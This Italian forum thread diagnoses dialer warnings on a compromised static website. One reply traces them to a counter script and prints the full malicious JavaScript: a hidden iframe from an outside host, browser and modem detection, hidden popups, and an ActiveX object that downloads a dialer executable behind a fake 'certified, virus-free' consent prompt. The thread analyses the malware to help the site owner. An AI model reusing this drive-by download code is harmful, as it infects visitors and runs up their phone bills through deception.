HTML e dialer: qualcosa non quadra

[WarriorXP]

Ciao,
ho un amico che ha un sito internet, e mi ha riferito che, d'un tratto:
- si è ritrovato con una password del sito (hostato su aruba) che non gli consente più il login (ed è vero perché ho controllato di persona);
- sostiene di aver incontrato dei dialer navigando su questo sito, con 2 PC diversi.

Ora, ho controllato personalmente l'HTML del sito (sono tutte semplici pagine web fatte con Frontpage) e ho trovato il codice pulito (dal dialer ovviamente xD)... Tenderei, dunque, ad escludere a priori che questo malware sia effettivamente connesso al sito e, tuttavia, il fatto che il problema si presenti con 2 PC diversi è certamente inusuale (possibile che entrambi i PC siano infestati da sé? E che diano avvisaglie sullo stesso sito?).

La mia domanda è: è possibile che, al contrario di quello che penso, il dialer possa essere effettivamente connesso al sito? E come farebbe a presentarsi, se l'HTML è pulito?

[java is forever]

C'e' della pubblicita' "strana" su questo sito?
Magari viene da li

[Finalfire]

Ciao,
ho un amico che ha un sito internet, e mi ha riferito che, d'un tratto:
- si è ritrovato con una password del sito (hostato su aruba) che non gli consente più il login (ed è vero perché ho controllato di persona);
- sostiene di aver incontrato dei dialer navigando su questo sito, con 2 PC diversi.

Ora, ho controllato personalmente l'HTML del sito (sono tutte semplici pagine web fatte con Frontpage) e ho trovato il codice pulito (dal dialer ovviamente xD)... Tenderei, dunque, ad escludere a priori che questo malware sia effettivamente connesso al sito e, tuttavia, il fatto che il problema si presenti con 2 PC diversi è certamente inusuale (possibile che entrambi i PC siano infestati da sé? E che diano avvisaglie sullo stesso sito?).

La mia domanda è: è possibile che, al contrario di quello che penso, il dialer possa essere effettivamente connesso al sito? E come farebbe a presentarsi, se l'HTML è pulito?

Warry
Anyway, controlla ogni riferimento Javascript nella pagina: magari, il dialer viene richiamato da la. Controlla anche link esterni.

[WarriorXP]

Ho controllato davvero tutto... Non ci sono pubblicità esterne né script sospetti! °_°
Quindi direi di escludere il dialer, a meno che non siano dialer futuristici che subentrano nella richiesta HTTP!

La pagina, comunque, è http://www.lucugnano.it/index.htm (se volete provare l'avviso di dialer con Internet Explorer; io purtroppo [?] da Linux ora non posso). Non l'ho fatta io, eh!

Mha.. A questo punto penso che entrambi di PC di quell'amico siano infetti.

[@@mikele90@@]

scusa ma cosa sarebbe questo dialer?una spece di virus per siti?(scusate l'ignoranza).
ma perché con ff nn me lo visualizza quell'errore mentre con ie si?

[java is forever]

scusa ma cosa sarebbe questo dialer?una spece di virus per siti?(scusate l'ignoranza).

I dialer sono quei programmi che ti gonfiano la bolletta

Praticamente cambiano il numero che usi per collegarti ad internet: da quello che usi ad uno ad altissimo costo. Sono usati per accedere a "contenuti particolari"

edit: con safari nessun problema sul sito

edit2
un consiglio: digli di togliere il testo scorrevole nella barra di stato, e' solo un elemento di disturbo

[Finalfire]

Ho controllato davvero tutto... Non ci sono pubblicità esterne né script sospetti! °_°
Quindi direi di escludere il dialer, a meno che non siano dialer futuristici che subentrano nella richiesta HTTP!

La pagina, comunque, è http://www.lucugnano.it/index.htm (se volete provare l'avviso di dialer con Internet Explorer; io purtroppo [?] da Linux ora non posso). Non l'ho fatta io, eh!

Mha.. A questo punto penso che entrambi di PC di quell'amico siano infetti.

Beh non e' detto, puo' anche essere. In fondo nella richiesta HTTP non ci sono sistemi di sicurezza tali da escludere questa probabilita'.

[Finalfire]

0za.u4gxbj.gondar-my.net, 216.12.207.66, Houston, Texas, latitudine 29.775499, longitudine -95.415199. Bingo

(non credo sia del web.stats, dato che ho controllato)

[WarriorXP]

0za.u4gxbj.gondar-my.net, 216.12.207.66, Houston, Texas, latitudine 29.775499, longitudine -95.415199. Bingo

(non credo sia del web.stats, dato che ho controllato)

Da dove ti è uscito? Perché ho appena provato col traceroute ma non c'è quella stringa.

[java is forever]

0za.u4gxbj.gondar-my.net, 216.12.207.66, Houston, Texas, latitudine 29.775499, longitudine -95.415199. Bingo

Cosa sarebbe?

[WarriorXP]

Cosa sarebbe?

Ha tutta l'aria di essere un nodo, ma ovviamente dipende da dove gli è uscito! xD

[Finalfire]

Ho notato che nel caricare quel sito si passa proprio attraverso questo nodo. Mi sembra strano che non te lo dia, dato che ho provato anch'io col traceroute per confermare ed effettivamente lo trova (lo catto su un file appena riesco a riaccedere <.<). Piu' che altro, non credo riguardi ne il DNS ne l'host stesso.

[L33T]

Ho notato che nel caricare quel sito si passa proprio attraverso questo nodo. Mi sembra strano che non te lo dia, dato che ho provato anch'io col traceroute per confermare ed effettivamente lo trova (lo catto su un file appena riesco a riaccedere <.<). Piu' che altro, non credo riguardi ne il DNS ne l'host stesso.

Il sito chiama http://stat.statistiche.ws/counter.php?user=20524, dove c'&#232; uno script che tra le altre cose genera un iframe.

Codice:

		if ( parseInt(pr17) <= parseInt("3") ) { 
	document.write('<div  style="position:absolute; left: -5000px; top: -5000px;visibility:hidden;">');
	document.write('<if'+'rame  frameborder="0" src="http://7vw.b5srdc.gondar-my.net/htm/cc1.php?p=55&cc2=IT"><'+'/iframe>' );
	document.write('</div>');
	};

Accedendo direttamente all'src dell'iframe non viene caricato niente, per&#242; osservando la pagina con il dom inspector si nota che l'iframe ha questo contenuto:

Codice:

if(window.parent == window) location.replace("cc1.php.htm?p=55");//it;
window.onerror = errorwindow;
function errorwindow(){return true; };
var msie = 1; 
var sp2 = 0 ;
var win = 1 ; 
var x_check_Z = "";
var x_check_Z1 = "";
var pop_block ;
var nav = navigator.userAgent.toLowerCase() ;
var disclaimer;
var date = new Date();
var cc = 0;
var ccmax=5;
	
	if (navigator.userLanguage) {
	var lan = navigator.userLanguage.toLowerCase() }
	else {var lan = navigator.language.toLowerCase()
	};

	if (!document.all) msie =0;
		if(nav) {
			if(!nav.match(/;-/) && !nav.match(/\(-/) ) {
				if(!(nav.match(/win/))) {win=0} 
				else if (nav.match(/sv1/) || nav.match(/msie 7/) ){sp2 = 1};
			}

		}
	else {win = 0;msie=0
	};
	
function insert(html) {
	if(msie==0) {
	document.body.innerHTML += html;
	} else {
	document.body.insertAdjacentHTML("BeforeEnd",html)
	}
}
		
	
function ErrorActiveX() {

if (cc < ccmax ) {
	cc ++;
	document.body.insertAdjacentHTML("BeforeEnd",x_check_Z)
	} else {
	cc = 0;
		if (confirm(disclaimer)) {document.body.insertAdjacentHTML("BeforeEnd",x_check_Z) }
		else {setTimeout('document.body.insertAdjacentHTML("BeforeEnd",x_check_Z)',50000)};
	};
};	


if (msie==1) {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=0,height=0,top=50000,left=50000" }
else {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=150,height=160,top=5000,left=5000"};

function go_adsl() { 
	if (win==1 && msie==1) {
var iframe_s = '<if' + 'rame src="/htm/winscript-51.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
	} else {
	};
};
function go_dialup() {
if (sp2==1 ) {
var iframe_s = '<if' + 'rame src="/htm/winscript-11.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
} else if (win==1 && msie==1) {
if(lan && lan.toLowerCase().match(/it/) ) {
	disclaimer = "\nNel tuo pc non e\' installato il software di accesso.\n\nPer visualizzare il sito devi installare correttamente questo software  garantito contro ogni virus!\n\nClicca su SI nell'avviso di protezione\n\n\nTi ricordiamo che il software e\' GARANTITO e CERTIFICATO!\n\n\nVuoi visitare il sito  in assoluta sicurezza ?\n";
	}
	else {
	disclaimer = "\nYou have to install the connection software to visit this site.\n\nIt is tested 100% virus free\n\nDo you wanto to proceed ?";
	};


	
x_check_Z = ')" id="A" CLASSID="CLSID:DB893839-10F0-4AF9-92FA-B23528F530AF" codebase="http://deposito.instantdoor.com/11769-23.exe"></object>';	
x_check_Z = '<object onerror="ErrorActiveX(' + x_check_Z ;
insert(x_check_Z);
x_check_Z1 = 'DB893839-10F0-4AF9-92FA-B23528F530AF" codebase="http://deposito.instantdoor.com/11769-23.exe"></object>';	
x_check_Z1 = '<object id="A" CLASSID="CLSID:' + x_check_Z1 ;


var aA1=window.open('/pop/win.php?vas=11769-23&ccmax=3&cs=0&rp=10000','my1',wparam);
var aA2=window.open('/pop/win.php?vas=11769-23&rt=20000&ccmax=3&cs=8805&rp=60000','my2',wparam);
var aA3=window.open('/pop/win.php?vas=11769-23&rt=25000&ccmax=3&cs=8805&rp=150000','my3',wparam);

if(!aA3 ) setTimeout("insert(x_check_Z1)",12000);
var aA4=window.open('/pop/win.php?vas=11769-23&rt=30000&ccmax=3&cs=8805&rp=220000','my4',wparam);
var iframe_s = '<if' + 'rame src="/htm/winscript-51.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
} else {
};
}
	function test_img() {

	IMG_TESTaZ = new Image();
	
	IMG_TESTaZ.src = "/adsl.jpg?" + Date.parse(date);
	setTimeout('if(IMG_TESTaZ.complete) {go_adsl() } else  {go_dialup() }', 1000 );
	
	}
	
	function test_m() {
		if (document.body && document.body.addBehavior ){
		document.body.addBehavior("#default#clientCaps");
			if(document.body.connectionType && document.body.connectionType == "modem") {
	
			go_dialup();
			} else {
	
			go_adsl();
			};
		} else {
		
		
		test_img();
		};
	};

if (!(sp2==1 && 11==0) &&  !( win==0 && 2==0) ) {
test_m();
};

La prima riga spiega perch&#232; lo script non sia accessibile direttamente, il resto si spiega da solo

[WarriorXP]

C**** ma questo &#232; un lavoro da professionisti... O_O
Grazie mille l33t!

[WarriorXP]

In ogni caso mi chiedo come diamine abbiamo fatto a metterci quel codice, visto che si tratta di pagine statiche... Forse hanno scoperto i dati di login? Mha...